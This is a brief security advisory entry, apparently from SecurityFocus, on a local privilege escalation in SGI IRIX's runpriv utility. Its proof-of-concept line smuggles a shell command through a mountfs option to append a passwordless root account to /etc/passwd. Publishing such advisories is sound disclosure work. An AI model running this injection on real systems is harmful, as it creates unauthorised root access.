SGI IRIX Runpriv Local Privilege Escalation Vulnerability

An exploit is not required.

The following proof of concept is available:
/usr/sysadm/bin/runpriv mountfs -s test -d / -o \|
"ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"


 

Copyright 2010, SecurityFocus